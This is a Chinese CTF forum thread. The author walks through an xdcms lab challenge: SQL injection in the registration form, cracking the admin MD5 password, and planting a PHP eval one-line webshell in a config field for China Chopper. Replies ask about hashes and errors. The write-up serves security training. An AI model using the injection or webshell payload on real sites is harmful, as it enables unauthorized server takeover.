用户
搜索

[在线挑战] 你是会员吗?

  • TA的每日心情
    开心
    2016-7-25 15:24
  • 签到天数: 2 天

    连续签到: 1 天

    [LV.1]初来乍到

    i春秋-呆萌菜鸟

    Rank: 1

    2

    主题

    11

    帖子

    73

    魔法币
    收听
    0
    粉丝
    0
    注册时间
    2015-11-20
    发表于 2016-7-28 01:31:27 135950
    本帖最后由 White55 于 2016-8-8 17:12 编辑

    实验环境
    • 实验环境

    • 实验工具:

      • BURP
      • SQLMap
      • 中国菜刀


    小i提示:
    • 在本次实验中,请注意实验工具、实验文件存放路径,不同的文件路径可能会出现不一样的实验结果。
    • 在实验环境中无法连接互联网,请使用您本地的网络环境。
    本次实验要求获取www.test.ichunqiu网站的FLAG信息。

    解题思路
    step1:
    看到这个实验的名字你是会员吗?感觉应该和注册有关,然后看到这个web应用是xdcms。百度一下关于xdcms的漏洞  看到这篇文章http://www.myhack58.com/Article/html/3/62/2014/41641.htm   讲了注册的地方 对POST提交的username变量没有过滤完全,可以绕过注入。然后看到文章最下面的exp  很明显应该先用burp suite抓包。
    step2:
    设置好代理之后用burp抓包注册页面
    1.png
    得到如下数据
    2.png
    按照step1里面的链接 把exp写上  注意要用  '(单引号) 闭合username数据    然后爆出用户名和密码 3.png
    经过cmd5解密 得到密文是xdcms212   用户名是xdcms121  我不清楚前面的1是个啥0。0   请大神指出  没太研究注入查询语句
    然后通过扫目录得到后台地址为www.test.ichunqiu/admin   输入用户名密码登录后台

       step4:
    进入后台翻了翻没找到上传格式设置 ,无奈又百度了下。  发现有一个和实验一 一样的 写配置文件一句话。于是下了一个xdcms在本地搭建环境试了试(因为,如果一不小心把实验对象的配置文件写坏了,就要重新开始了。。。)。进入系统设置=》网站配置=》基本信息   网站地址被写入 网站代码的\system\xdcms.inc.php 文件中
    4.png
    这样的话 可以通过 在网站地址写入    ');eval($_POST["pass"]); //       来插入一句话木马。(注意单引号以及反括号的闭合)
    6.png
    然后通过菜刀连接一句话   地址是 http://www.test.ichuqniu/system/xdcms.inc.php    密码为pass  
    得到shell之后找到flag 大功告成


    ==============================分割线==============================================
    经过再三测试  发现原来是主机上的版本  ;  分号    被过滤了  所以这种方法行不通 但是下载下来的cms在本地测试是可以的    不过也算是一个思路吧


    发表于 2016-7-28 10:18:49
    学习了。感谢分享。
    使用道具 举报 回复
    发表于 2016-7-28 11:23:01
    这就尴尬了
    使用道具 举报 回复
    发表于 2016-7-28 11:48:38

    。。。确实很尴尬。。。 因为插一句话我在本地是插得了的。。。  实验的怎么插都不行    贼尴尬 昨天点的保存草稿。。。 这尼玛直接发出去了  
    使用道具 举报 回复
    在哪查的MD5能共享下吗?
    使用道具 举报 回复
    发表于 2016-8-8 17:10:53
    岚岚自语 发表于 2016-7-29 16:24
    在哪查的MD5能共享下吗?

    额   www.cmd5.com啊。 。。 不过是收费的
    使用道具 举报 回复
    发表于 2016-8-30 17:36:26
    不是很明白
    使用道具 举报 回复
    发表于 2016-10-5 10:42:21
    密码的MD5 只能看到26位,剩下的6位看不到,何解?
    sql.png
    使用道具 举报 回复
    发表于 2016-10-31 17:14:13
    本帖最后由 qmxc 于 2016-10-31 17:24 编辑

    xdcms212的md5加密结果
    查询结果:                                                                         
                                            md5(xdcms212,32) = e890790166bfb88ee91047c64cda7aad
    md5(xdcms212,16) = 66bfb88ee91047c6


    MD5值怎么不一样?
    使用道具 举报 回复
    本帖最后由 我也匿个名 于 2016-11-10 15:17 编辑
    qmxc 发表于 2016-10-31 17:14
    xdcms212的md5加密结果
    查询结果:                                                                        
                                            md5(xdcms212,32)  ...
    md5(md5($pass))
    使用道具 举报 回复
    White55 发表于 2016-7-28 11:48
    。。。确实很尴尬。。。 因为插一句话我在本地是插得了的。。。  实验的怎么插都不行    贼尴尬 昨天点的 ...

    后台还有办法插一句话么
    使用道具 举报 回复
    发表于 2016-12-14 16:41:11
    我也匿个名 发表于 2016-11-10 15:22
    后台还有办法插一句话么

    插进去了么?
    使用道具 举报 回复
    发表于 2017-1-5 09:35:41
    username=’“”exp内容“”’之后出现乱码了怎么办
    使用道具 举报 回复
    最后插入一句话是怎么插入呢?我插入报错:Parse error: syntax error, unexpected T_EVAL in
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册